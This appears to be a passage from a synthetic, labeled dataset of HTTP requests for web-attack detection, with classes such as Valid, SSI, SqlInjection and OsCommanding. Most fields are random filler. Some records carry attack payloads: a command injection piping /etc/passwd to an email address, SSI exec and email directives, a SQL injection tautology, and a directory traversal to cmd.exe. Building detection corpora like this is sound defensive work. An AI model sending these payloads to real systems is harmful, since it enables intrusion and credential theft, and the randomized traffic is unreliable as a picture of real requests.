b6=iwpsm08xcgs&@q8insertzb=oops     ;     cat /etc/passwd     |   mail   your@e7.com&miagmSag=t&Y60voptXaTw=adnebehsclnc&ot31e=e&@VaoS=087&jfrSe58Pep2ea=2&oybsooxRhhut6ne=iudb0uw|&GV-wp-k@HdWUl=ndnT &5jhateeHebahs=ei&ayaLmtNooedn=658778&eeteKrexeaf=j@_XCPJEWG&ecpicrssersoab=eo&atnn9u6rwbs=iLAGeugC

End - Id: 43037
Start - Id: 39210
class: SSI
POST /cSa.71_i1M/Ixdl6drdedlhedksIm/rpaTlt5oneoieeiab4i/tRbvNef0w3pA/eterkiEfra/8ae0iea/d69TwS-YqsCkTr/lP3k/suecmtoah/oejeynyrtneEjui6.asmx? HTTP/1.0
Content-Length: 344
Content-Language: E,FmHschut
Content-Encoding: identity
Content-MD5: ZmFncGVpdDR6RTh0YmVzOA==
Content-Type: application/x-www-form-urlencoded
Host: 103.78.131.200
Connection: rUeracr
Accept: */*
Accept-Charset: iso-8859-7, x-mac-turkish;q=0.4, iso-8859-3;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: aaeeLp-hd5esdba, tplnfyer-toda;q=0.4, ydrfgtrA-cyem;q=0.2, oLbr-eseSnohs;q=0.1
Cache-Control: max-age=8
Cookie2: $Version="9"
If-Match: *
If-None-Match: "V87v90pOD0eXgUhwp"
Max-Forwards: 5
Authorization: Basic NUlnaTo1bmVwMg==
Referer: /8gmt1ea2/nohQ7y/tos3eie0/dsdo1ve/ignw7a.php4
User-Agent: aoi7ewxoeTe
UA-CPU: Sparc
Upgrade: rtsnd/8.0, EPe/0.5, ifwEjo/6.1, Gcurl/2.9, oebc1t/4.1

hmuhrir9odo=<!--#exec  cgi="/cgi-bin/script?baho"  -->&LKdrop61Vb=gdlmig&.CciAautoexec=814437&BBnullQ6-P=lnleuii9ge&60air=Iebs1ob9yea&1RBrDUcjxona=232035405&eerlsMh=1XAtN&BoptDb2TbafUo=h8- i&osOifnsIdEDik=94355929&mn1rachowinm5Ll=Rs$ir&eVTT=72668&5mochat6OnO83k9=e4qjnmP9nm&OsezqEhunmroyu=4770503925&3teiHh=e-l&7ae=euV1NzS

End - Id: 39210
Start - Id: 30173
class: Valid
GET /Lnh0wtewddfeaTst1hOn/i3y/MscriptMbOaC7VCv/xp_UBR8pnzzd/osMYW7Ix93s/eZHhmkC9TguecSoT/esnejsiNfAdinn/mqUAOKgVEq/ghepsldy9tdEOstedos/ruMrq-m32PYV1/n@QzzY3vg5/oN6xi58DeCArrg.php?tsiXhBukGaeus=424072&hAJx4TR83=100989&MuT2g5A.dropm=atsdo&Je5c=ginwfa0oupehHte&teda=imgetnb&vrctSi66ntetana=o&eF3hdUe9=%3DBrsaa%7C&bdpI=sM1t HTTP/1.1
Host: www.8wtesh.fr:5838
Connection: keep-alive
Accept: text/*;q=0.4, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ae-oekdnc, R80Ae-oA;q=0.7
Cache-Control: max-age=8069
Client-ip: 111.9.97.121
Cookie: vsookc8Ea=n;csreohHljlr=2tazita:;9endflirtlW=9320025;6y1samhl=tlocationoz;eor2=7safsw
Cookie2: $Version="3"
Date: Wed, 23 Mar 05 15:58:07 CET
ETag: W/"jjm@N-l1CcVk.VXsfi"
Expect: Ggag
From: n30oip@sye2lHtos.gov
If-Modified-Since: Tue, 06 Sep 05 21:16:04 UTC
If-Unmodified-Since: Fri, 24 Nov 06 21:55:48 GMT
If-Match: *
If-None-Match: "wCV3lrmngQrNoKbwF"
If-Range: "wAl6SqMF18zZ_9r"
Max-Forwards: 1071
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: NTLM a2dpdGhycGx0b3RzeGVlbnNyYTdyOHJzcnRwNWVpdGFhQ2FhaXI=
Range: 77-,-72,-70
Referer: /osfyeg/uaigtv/aetnnu.exe
TE: chunked;q=0.9,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.9 (Windows; U; Win 9x 5.1; d2-lk; rv:7.0.1) Gecko/32557772
UA-CPU: Sparc
UA-Disp: 133,828,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: 5.2 137.115.198.126:3
Transfer-Encoding: wwcxd8
Upgrade: delna/9.9, tta/9.0
Warning: 337 145.226.205.116 "slrtoretepnre" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 5387143927109477044
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30173
Start - Id: 31414
class: Valid
GET /AhrbdrCRotgrAlaN/bogseietyaoEea/aSCgvjc5m3eUWE/i7h2lMZ/aj0g/daq4MS@gQ-c@Z.php3?aeiryaMN=84&smiareunhesCeL=a+n7blike%3C%5Craanull1ADe&tj5r5rtut=+selectco&en=7670305 HTTP/1.0
Host: www.gnrlstth.cz
Connection: close
Accept: application/zip, image/*;q=0.5, audio/*
Accept-Charset: x-mac-hebrew, iso-8859-4, iso-8859-3;q=0.5, iso-8859-7, x-mac-hebrew;q=0.0
Accept-Encoding: deflate;q=0.4, deflate;q=0.4, identity, gzip;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 193.151.161.20
Cookie: 8XO9cU=cDE4gpIOI;0wget1o=a@binf0racceptoAi  tl;enep9f=accept-Og?7/to7e%apnke3a
Cookie2: $Version="5"
Date: Thu, 19 Mar 09 06:07:41 CET
ETag: "8xlzTrkjniM_O5RD"
Expect: CEnru=ndPz;grutd4a=tifut
From: Tzeuatea@eoges.de
If-Modified-Since: Tue, 19 May 09 12:28:51 GMT
If-Unmodified-Since: Sat, 14 Jun 08 13:22:13 GMT
If-Match: "hp6Dc4bBUIUcMNQ"
If-None-Match: "bAw7Z4SFQMn.@y40HnU"
If-Range: Tue, 09 Feb 10 05:43:41 CET
Max-Forwards: 12
MIME-Version: 1.9
Pragma: sTi=o4mleae
Proxy-Authorization: NTLM dXV2bW9PMmVlZXM1ZWVvaHhocmhld0x0blRpbXZibGpjcnQ=
Authorization: Digest nc=56b182Ec
Range: -2,67-
Referer: /C4pybula.jsp
TE: chunked,trailers,gzip
Trailer: Via
User-Agent: lyr2mYg http://www.eatbwe.be
UA-CPU: StrongARM
UA-Disp: 8050,889,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2355x254
Via: FTP/7.7 19.216.131.76, 0.8 www.mary.shtml, 9.3 112.206.64.61:97
Transfer-Encoding: gzip
Upgrade: ais6/4.7, ynexo/4.8, 87uro/6.1, ivonH/5.3
Warning: 388 www.tfrat7d.jpeg:096 "hrsa7mrlleyurua" "Tue, 09 Mar 10 03:42:13 CET"
X-Forwarded-For: 102.76.222.209
X-Serial-Number: 886445544
----: -------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 31414
Start - Id: 39368
class: SSI
GET /lboot.inior_0a73qtH/lNCauibadO.js?tcecsowsdE=0285841&RA0TGpfexec=%3C%21--%23email+fromhost%3D%22www.itxew3u.com%22+tohost%3D%22mailbox.3rsee.com%22+message%3D%22antOa+rnuihb+cSirR9z+sn6%22+fromaddress%3D%22e8i2.com%22+toaddress%3D%22bRcuo.Aet.com%22+subject%3D%22a%22+sender%3D%22qt.com%22+replyto%3D%22ptetP.com%22+cc%3D%22pa%22+inreplyto%3D%22rit+yYd+g%22+id%3D%22siceomail%22+--%3E&maocrjeasidb9tE=%7C&owtq2ioami=oc3dh-_Q1hAL&tys4mOatcohe=h&n_WL5etcj=a%3Bm HTTP/1.0
Host: 231.131.146.63
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.8, deflate;q=0.4, gzip;q=0.7, deflate
Accept-Language: ihth-nhch9e;q=0.0, erbe-oenuher, dnseny-ae;q=0.3
Cache-Control: no-transform
Client-ip: 186.197.175.198
Cookie: esos1=5290;deleteun-RgdrmR=o87ifAetct;yoslDulIk=eecrss;yn5wrunz=esdmrn;nder=Riamd;dtgtrfcuakhn=595956
Cookie2: $Version="92"
Date: Wed, 18 Feb 09 24:25:27 CET
ETag: "otK3._w2Ir0715BPHo"
Expect: 100-continue
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 30 Oct 09 15:16:07 CET
If-Unmodified-Since: Sat, 29 May 04 07:09:06 GMT
If-Match: "_iMfvm.9iG3oxzzt5"
If-None-Match: *
If-Range: Wed, 20 Feb 08 08:46:09 UTC
Max-Forwards: 89
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic em5ldHNsZTplTXRuT3Jvdg==
Authorization: Digest nonce
Range: 396191-323,-9
Referer: /icepbeha/EeIi/sbdk/dyw1GaDr.exe
TE: chunked,deflate,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/0.0 (Machintosh; U; Mac OS X 9.7; eo-Ze; rv:8.0.1) Gecko/87742478
UA-CPU: 68000
UA-Disp: 071,646,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3402x217
Via: 9.8 91.2.152.197, haroe/1.8 146.171.90.74, FTP/6.0 www.fslhrtal.htm:92215
Transfer-Encoding: obfna
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 323 73.178.52.116:03197 "ltotAehablocoeeRgen" "Sun, 08 Feb 09 14:43:34 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 93635281760343064416
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39368
Start - Id: 18623
class: Valid
GET /6S7HcJn9.c-tpNQNlhg.shtml?hetinernetriaIu=aioeb&Oaqanevazw=5%26lt+yhttp-ecos&euhDii9snnem4=shl&eGnl=leiHe&pe4o7layiwav=i%28tawhttpssaetncaccept&9o56=847&zvA0E17as=AungYlccrmwh41r&aeRd=ishr&sdelcITceepy=onr&pwws6n=llyl&anmevhec2=thsh&rtt9enxt=3&a4ordivxO=34690450 HTTP/1.0
Host: 14.118.242.139
Connection: oisTot
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 224.49.207.166
Cookie: ioi8eiEBRa=404
Cookie2: $Version="38"
Date: Wed, 22 Nov 06 22:16:26 CET
ETag: "NnKgyFyK92tfQrPcAGw"
Expect: 100-continue
From: WuraiaaN@7ttgiDeiio.org
If-Modified-Since: Sat, 14 Feb 09 12:50:45 GMT
If-Unmodified-Since: Tue, 21 Mar 06 21:41:17 CET
If-Match: "i1HZmniHlBAzc4mp9R"
If-None-Match: "vvo7UrVRATxP3fzyh.dW"
If-Range: Fri, 19 May 06 04:39:50 UTC
Max-Forwards: 85
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZW90YWlpOmhmZWhlRQ==
Authorization: NTLM dG5ycnJoQXR3aDdkZXN0ZWNiOHRlYmU1Z3NhYWhkOGZzY2Y=
Range: -0
Referer: http://le3se.uk/puelhsj2/asegsb/aKhossr/0nliU.swf
TE: gzip,deflate;q=0.5,chunked;q=0.3
Trailer: Pragma
User-Agent: sqle3iurEF/2.7
UA-CPU: 68000
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7882x967
Via: 4.2 46.151.148.155
Transfer-Encoding: compress
Upgrade: ndniu/9.9, rsSssn/8.8, bry2/5.0, aEnc/1.0
Warning: 858 www.lwelElt3.png "1bxSreEt8b" "Fri, 04 Jun 04 02:26:38 UTC"
X-Forwarded-For: 72.228.20.6
X-Serial-Number: 41593026
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18623
Start - Id: 14518
class: Valid
GET /lsZlQUVc/cilzoNIsVchteFzm41l/ucA.u7h/5a2iej1Drj/5l4ke8ixxBP1H.VKo.jpeg? HTTP/1.0
Host: www.rta2i.gov:59866
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.9, identity, deflate, identity;q=0.7, identity
Accept-Language: st-tnady;q=0.2
Cache-Control: max-age=101
Client-ip: 119.245.171.52
Cookie: hecsieosiall=41673
Cookie2: $Version="47"
Date: Sat, 18 Jun 05 20:13:54 UTC
ETag: "rRmqwhf@rbp5lVhHR"
Expect: 100-continue
From: ateo@totu.fr
If-Modified-Since: Tue, 20 Feb 07 08:59:10 UTC
If-Unmodified-Since: Wed, 21 Jan 09 17:17:17 GMT
If-Match: *
If-None-Match: "G_j74Q.2qs7Cyq1307"
If-Range: Thu, 03 Mar 05 17:44:16 UTC
Max-Forwards: 5
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic ZXVBTGdpdHM6RW9haG1oYw==
Authorization: Basic SWc5N201YWE6aXRQYw==
Range: 4019-22,-23,269-5
Referer: http://www.intagmd.com/ecoec3l.php3
TE: trailers,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: syeP0wg http://www.ksno0yc.st
UA-CPU: StrongARM
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3486x145
Via: 4.5 www.jotntShl.htm:72908, 6.4 194.66.15.179:5
Transfer-Encoding: deflate
Upgrade: ybp/8.9, iTtr2/2.5, fay5/2.8, soboni/1.5
Warning: 286 www.onba2h.tiff "okewrt0tac" "Sun, 08 May 05 11:09:41 GMT"
X-Forwarded-For: 129.8.69.87
X-Serial-Number: 01337
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14518
Start - Id: 13726
class: Valid
GET /j7-5-38h5h6P.asmx?re0npz8tt58=xao&Kid5iNNJ=tod1ralhtt&tmpY86K4N5cZvX=888341&e8Utinye=eiwis7+sa%7Er4 HTTP/1.1
Host: www.lssw.gov:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, gzip;q=0.6, identity;q=0.1, gzip;q=0.5
Accept-Language: IhudnT8e-h2, ngr-ere, Io-reo6p
Cache-Control: no-transform
Client-ip: 239.103.98.206
Cookie: arsgh=213968;heLkmiixt2ppmi=h/o;Er7e=9753
Cookie2: $Version="95"
Date: Sun, 02 Jul 06 15:16:49 GMT
ETag: W/"a_ZfpksVbF0IZ4QA"
Expect: R2ra
From: ep4c@gnrwie6l.biz
If-Modified-Since: Tue, 31 Jul 07 09:29:14 CET
If-Unmodified-Since: Mon, 02 May 05 23:16:58 GMT
If-Match: "caJKCc4O32oT7uwtS"
If-None-Match: "J.Uch77mFnoT2h3"
If-Range: Fri, 22 Apr 05 03:04:25 GMT
Max-Forwards: 8
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://sliaCear.fr/xlh1/4tmg/t5e1.mp3
Authorization: Basic aHRiY251czpONmV0bGk=
Range: -05
Referer: /hoISho/manzti/tezt.zip
TE: trailers
Trailer: Pragma
User-Agent: hctZ5g http://www.Eih2ert4.de
UA-CPU: PowerPC
UA-Disp: 911,125,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6985x6776
Via: 4.9 www.t89mtE.htm
Transfer-Encoding: identity
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 465 123.84.85.72 "ierheaeNiutccea" 
X-Forwarded-For: 170.219.207.191
X-Serial-Number: 1852790108043394492
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13726
Start - Id: 10104
class: Valid
GET /h16/ehrnytufehyeRrnEIics/bIiK/iemy7e15ayhn/y7Rd..qSrAxu.aspx?nse=ylotW&znnrj=t+c&iaten=3&eGfArW9VL=ylY52J&Inr8et=lpygtt+spi&fhdeluaroemlat=h0hsewe5rh2ezehais&ed1tclt=rYeilomqdwsaemnnf&Eecotb=934&apiheQlih=nglhwNTK&ss=Io%24+esnntbwdftpform&bstyleSBWM=%7EtnaneQe&eeSiiU8sedlmh=oio&0dhJobn=aeiotcdtstse HTTP/1.1
Host: 80.31.215.100
Connection: close
Accept: image/gif;q=0.0, text/xml
Accept-Charset: macintosh;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.7
Cache-Control: max-stale=6866
Client-ip: 125.47.27.37
Cookie: nh=h5Ja;oesoenizfscepde=kf
Cookie2: $Version="8"
Date: Mon, 15 Dec 08 22:17:26 UTC
ETag: W/"qhAFypJsMzDfSv7nCR9a"
Expect: 100-continue
From: tsbr5seo@najlknme.it
If-Modified-Since: Fri, 16 Dec 05 22:29:43 UTC
If-Unmodified-Since: Thu, 30 Dec 04 03:37:20 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 71
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic d2lia25yczpzNnR0
Authorization: Basic cmJ1ZXJ0Oml3bGRy
Range: -4,998277-
Referer: http://irdae.st/4aeL/ndbfr/btensQ/corMr.txt
TE: gzip;q=0.1,trailers
Trailer: If-Match
User-Agent: Mozilla/4.2 (compatible; nubhi; Solaris; 9nstonst)
UA-CPU: x86
UA-Disp: 886,964,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9723x8891
Via: HTTP/6.7 111.67.200.23
Transfer-Encoding: deflate
Upgrade: Nraco/5.1, 3tms/3.4
Warning: 301 www.Ipmhyt.jpeg "eqieennEenOi6nv" 
X-Forwarded-For: 219.87.157.60
X-Serial-Number: 70224009
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10104
Start - Id: 42321
class: SqlInjection
GET /dtbbp/noF4FYoPpRdmbMn7/rEe/fCg@Zorh.DuLf/voaGnrnguic/somhe/J-/rnNVMfcCYHG/1neegmbeisnxOettglp/aswaioetdllta/swhhtpt/Nlhm6nD3n.nsf?Hv8raritbdt7ai=eedsoe&idn=i+&both=79280596&UhpE9bnhx=tkeAtsd2O5ece&ReuTpcia=rasnjrjhfsruaw&rooxfLuaaiDw=0544932&nons1hekeehkkpg=OrigText%27OR%27ehquisn%27+%3D%27ntlAar%27 HTTP/1.0
Host: www.omcnk.net:5
Connection: lhte
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rptsoa-wh, ad-qwx;q=0.5, ioeiimrp-3aazlen;q=0.9, ie-etf19td;q=0.3, a-bJexTEhf
Cache-Control: no-cache
Client-ip: 64.206.153.107
Cookie: 8eoaon=oNNvLS
Cookie2: $Version="97"
Date: Sat, 14 Mar 09 20:47:26 CET
ETag: "TofU@QbCUF13A_Qc"
Expect: rlstreu=Tpet8sAn
From: vtsibh@nsti.biz
If-Modified-Since: Sun, 28 Oct 07 03:27:22 CET
If-Unmodified-Since: Tue, 10 Apr 07 06:16:19 UTC
If-Match: "M32w8oPcU6FIGNc9"
If-None-Match: *
If-Range: "34tX5k06-tS.PcRqB"
Max-Forwards: 5676
MIME-Version: 7.7
Pragma: noo=gfqeAmf
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Digest cnonce="sli9ah"
Range: -36
Referer: http://kreLa.biz/dno98h/sane/ehfets/ehieHt/forealne.bin
TE: chunked;q=0.6
Trailer: If-Match
User-Agent: Mozilla/9.1 (Windows; U; WinNT 4.4; oj-se; rv:3.8.4) Gecko/95244866
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: 9.6 226.125.32.118:56
Transfer-Encoding: identity
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42321
Start - Id: 22735
class: Valid
GET /SmetaZZ_5copyKKRIhtpassMqK/cXPCgPkPJ/hn/lev1rS0eBcghi8lrt/4nX.havingS/eOsibej/siR/eFkgV3g1KpxIlwoYtH/3i/wjqYI6/nUY7WI/pF54@398t1lQVr8qE.exe? HTTP/1.1
Host: www.d2ssc.gov
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-korean;q=0.3, x-mac-greek;q=0.8, euc-cn;q=0.3, x-mac-arabic;q=0.6
Accept-Encoding: deflate
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 39.67.118.115
Cookie: MdeletenPV1IV=nslnQs;5gs3r=nGdlhdua0ima;K9Q1etc292AM=ynAJOWG9QOG;if2timeEapt=~nrwp-s
Cookie2: $Version="3"
Date: Fri, 06 Jul 07 05:16:08 GMT
ETag: W/"Hw.-vMq@PRe4kqvba1"
Expect: loaig=e0ueme
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Thu, 29 Dec 05 15:15:07 UTC
If-Unmodified-Since: Wed, 03 Sep 08 04:26:48 CET
If-Match: "MdNqJK4cAlXxcSc4.ci"
If-None-Match: *
If-Range: Mon, 29 Jun 09 06:10:11 UTC
Max-Forwards: 1
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: Digest uri=/hoiTptrr/lKaatsus/knaA.php4
Range: -59538
Referer: http://iihnwiM.de/wfem6/s4or/Tlut.html
TE: trailers,trailers
Trailer: Upgrade
User-Agent: elru (rdhPT0PKHc)
UA-CPU: MIPS
UA-Disp: 482,155,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0084x738
Via: HTTP/0.8 www.s8me2psw.html:62555, FTP/1.0 www.eOmenis.jpeg:1219, HTTP/8.3 www.3itew.shtml
Transfer-Encoding: gzip
Upgrade: nt4mte/1.5, e7ttw/7.8, rqstaj/5.3, 2fytn/3.2, adu/2.2
Warning: 182 www.rerdnho.gif "mnllioitep3or1" "Mon, 05 Nov 07 14:36:08 UTC"
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 46126280
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 22735
Start - Id: 17850
class: Valid
GET /pPx7zpassthruMMl0/iz4dkJb-3O-oS9I66Gc/BzhUsh5riodasauno3q5/rj6q/-2pyYsqaccept/moxGdsitu4i/qli7sn9i74hh/swALGpo6la/ulm4PiosMwea/b.cQy/aLJCBb48fkW1dsU.cgi?hnafestjvmh=rhWsgNyU&nlt4arDteo=103386079&cCasnn=7o8tswhere%3E%26n8ycO2c&wi7tarin=ihnaien8snc&aav0hZto7ukt=hVWI4lXW65V8&tvn3j=ele&htaccesT6PZQOw=ttai&QIVXRuVVvH=12228&copyMehnetcatBCbhtpassdrop=efxiohw%3Bs&ebMyntoSsoenoXt=optss%3Blikei%40uo4Ist%3Fa HTTP/1.1
Host: 111.32.210.111
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: us-ascii;q=0.4, windows-1253, euc-jp;q=0.3, windows-1250, x-mac-japanese
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 127.87.0.41
Cookie: 4Alohitmpi=enDniSasoiwhhah;5.qH.7L7urRY=6767102;ee0o1sasoRet=suuee;deleteUmbM3Ae@C9=0zrXB
Cookie2: $Version="86"
Date: Tue, 02 Dec 08 21:33:45 UTC
ETag: "GmYG65fP8d7@e.XDKdK"
Expect: 100-continue
From: lrnihbje@e0fdWo.be
If-Modified-Since: Sun, 01 Jul 07 14:02:13 UTC
If-Unmodified-Since: Mon, 24 Sep 07 20:03:41 GMT
If-Match: "Gg@tbkqzOjXknJ4"
If-None-Match: "EUHLqTAq_Y3ITYq9r6B"
If-Range: Mon, 05 Apr 04 16:04:49 UTC
Max-Forwards: 17
MIME-Version: 8.0
Pragma: pyaogE=f
Proxy-Authorization: Digest nonce
Authorization: Digest uri=/cied43/n2tr/gSdoo5nw.php3
Range: 5-3
Referer: http://www.hrfuee.fr/rtan8.asp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.8 (compatible; Dt4gDNmh; Mac OS X; ovrg; 05uh)
UA-CPU: 68000
UA-Disp: 8443,978,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3160x969
Via: FTP/9.9 156.14.24.88
Transfer-Encoding: compress
Upgrade: tsE/0.1
Warning: 251 www.imAynCn2.html:1876 "wyu5ls5teb2nziefeO" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 164483377111827
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17850
Start - Id: 36591
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 51.118.37.219
Connection: daemet
Accept: video/mpeg;q=0.6
Accept-Charset: hz-gb-2312, macintosh, iso-2022-jp;q=0.2, euc-tw;q=0.4
Accept-Encoding: 
Accept-Language: uDlhees-Eeew;q=0.2, t-jdj;q=0.8, aenr2-eQ, esydeh-2u;q=0.9, LiSt-petr;q=0.6
Cache-Control: no-store
Client-ip: 88.241.103.90
Cookie: tfcbiaeolEm=aIoar~n;lpo0QOKe9tsF=2;kx6s=oirofsdtotow;6e=csv
Cookie2: $Version="52"
Date: Wed, 19 May 04 24:42:28 GMT
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 26 Mar 09 02:12:14 UTC
If-Unmodified-Since: Sun, 04 Apr 04 10:55:04 GMT
If-Match: *
If-None-Match: "jUpFmEEN-J_DlhUFJX3c"
If-Range: Tue, 28 Feb 06 08:57:46 CET
Max-Forwards: 365
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM czRtdGlldHNTck5sbHRzZ3VlaWF0dHM2SWNlYThpcGw=
Authorization: Basic dHZyb2VpOmk0aEVpNA==
Range: -5
Referer: http://www.qwHv.de/Eech/0tsa9/ntyltyX.txt
TE: chunked
Trailer: Referer
User-Agent: 4l7Homo/4.5.3.9.2
UA-CPU: MIPS
UA-Disp: 750,0599,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 7.0 www.echssscn.htm, 7.7 www.Tero.tiff
Transfer-Encoding: weytp; aa4iwne=on7I4ht
Upgrade: ldezE/3.1, ieuhio/3.5, vasgc/3.8, trl4e/6.5
Warning: 611 www.lnn5olje.js "lioehd4dehdsc3y" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 85538465859468
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36591
Start - Id: 1007
class: Valid
GET /oein/oomo/ttb/wkNYR6stmom/gh30tCieie/2pexecwT3Q.html?Gn5jakBP=isattenamWl&etnltetnue=5O2r&insisfe1bpso7nn=esBZJr4iF9W&dK@@035-6Y=ndocumentirseAec9%3Dtqs&ubhtncE=hda HTTP/1.1
Host: www.oWin.it:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 54.9.122.101
Cookie: tpsaampav0homae=nsPs-V9@J6l
Cookie2: $Version="946"
Date: Fri, 06 Nov 09 20:54:31 UTC
ETag: W/"4k_LvEQG.-hKsyTNih"
Expect: 100-continue
From: egiisae@csetOkr6S.it
If-Modified-Since: Mon, 21 Sep 09 06:51:51 UTC
If-Unmodified-Since: Wed, 05 May 10 19:59:00 GMT
If-Match: *
If-None-Match: "5-Y8khGSZOtQBfNOs"
If-Range: Tue, 28 Aug 07 07:44:07 GMT
Max-Forwards: 7
MIME-Version: 5.1
Pragma: H=e
Proxy-Authorization: Basic aXNqdWU6b2hhZWlhc2M=
Authorization: Digest algorithm=MD5
Range: 726319-,933-
Referer: http://mnsxhv.st/loHGuM/oma0j/2oof/hnitp/ssAo.mpg
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/4.9 (Machintosh; U; PPC Mac OS X 4.8; e4-tm; rv:5.0.1) Gecko/09285042
UA-CPU: x86
UA-Disp: 419,762,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5033x777
Via: 3.7 63.100.142.155
Transfer-Encoding: gzip
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 650 www.lea7a.gif:46487 "aesAspernrsroimob" 
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 90115734669182651364
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1007
Start - Id: 16219
class: Valid
GET /xmlXIF.Nuscriptb/s36O/CyK1tdropcI06/QtRdeletevwhereYbetweenosD/nEO/eoecb/e2UmyZuz9gx2dn81kIp2/tebtf.aspx?tn4erhaPs80eI=04096&arnhbtbnniTPy=hh&AEsaccess_loghbinX=v%3C6C&AC3q6H=xunionwke&hTYi=styles%3BGn&SeuoarPa=bEr&m5n1l=rk HTTP/1.1
Host: 102.122.122.153
Connection: tytehiew
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wt-he4t7, aetis-jeeudA;q=0.5
Cache-Control: max-age=08079
Client-ip: 212.211.65.100
Cookie: odnFu=eElink
Cookie2: $Version="89"
Date: Thu, 06 Jan 05 22:55:59 GMT
ETag: W/"-YffN6UEXpgSmLqqvJa"
Expect: 100-continue
From: ayzaa@q0mhuylt.cz
If-Modified-Since: Mon, 14 Feb 05 05:57:13 UTC
If-Unmodified-Since: Tue, 10 Jan 06 13:23:39 UTC
If-Match: "@FZ5kmiRi-3uH_KAqm_"
If-None-Match: *
